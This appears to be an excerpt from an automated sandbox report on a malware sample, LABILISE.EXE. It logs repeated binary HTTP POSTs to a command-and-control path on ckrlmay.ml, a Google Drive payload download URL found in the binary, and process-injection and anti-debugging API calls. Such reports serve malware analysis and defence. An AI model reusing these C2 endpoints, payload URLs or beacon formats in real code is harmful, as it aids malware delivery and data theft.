            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: global trafficHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 165Connection: close
            Source: unknownDNS traffic detected: queries for: doc-0c-5g-docs.googleusercontent.com
            Source: unknownHTTP traffic detected: POST /PKZ/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: ckrlmay.mlAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 499A343AContent-Length: 192Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 Jul 2020 15:34:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeSet-Cookie: __cfduid=dea8598219852c20e6239a6212c084f851596123244; expires=Sat, 29-Aug-20 15:34:04 GMT; path=/; domain=.ckrlmay.ml; HttpOnly; SameSite=LaxStatus: 404 Not FoundCF-Cache-Status: DYNAMICcf-request-id: 0441f4fff70000f93726a24200000001Server: cloudflareCF-RAY: 5bb024465b8bf937-MXPData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: LABILISE.EXEString found in binary or memory: https://drive.google.com/uc?export=download&id=1_Jf4uH2oYH4gwqfp-_mlT9ALhrpqjjUH
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F9E4B NtResumeThread,0_2_021F9E4B
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F986E NtProtectVirtualMemory,0_2_021F986E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F08B6 EnumWindows,NtSetInformationThread,TerminateProcess,0_2_021F08B6
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F38FC NtWriteVirtualMemory,0_2_021F38FC
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021FA230 NtResumeThread,0_2_021FA230
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F9E58 NtResumeThread,0_2_021F9E58
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F0A7A NtSetInformationThread,TerminateProcess,0_2_021F0A7A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F8916 NtSetInformationThread,TerminateProcess,0_2_021F8916
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F3D30 NtWriteVirtualMemory,0_2_021F3D30
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F3F22 NtWriteVirtualMemory,0_2_021F3F22
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F3B52 NtWriteVirtualMemory,0_2_021F3B52
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021FA540 NtResumeThread,0_2_021FA540
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021FA37A NtResumeThread,0_2_021FA37A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F396C NtWriteVirtualMemory,0_2_021F396C
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 0_2_021F9FA1 NtResumeThread,0_2_021F9FA1
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_00569E4B NtSetInformationThread,1_2_00569E4B
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_0056986E NtProtectVirtualMemory,1_2_0056986E
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_005608B6 EnumWindows,NtSetInformationThread,1_2_005608B6
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_00569E58 NtSetInformationThread,1_2_00569E58
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_00560A7A NtSetInformationThread,1_2_00560A7A
            Source: C:\Users\user\Desktop\LABILISE.EXECode function: 1_2_0056A230 NtSetInformationThread,1_2_0056A230
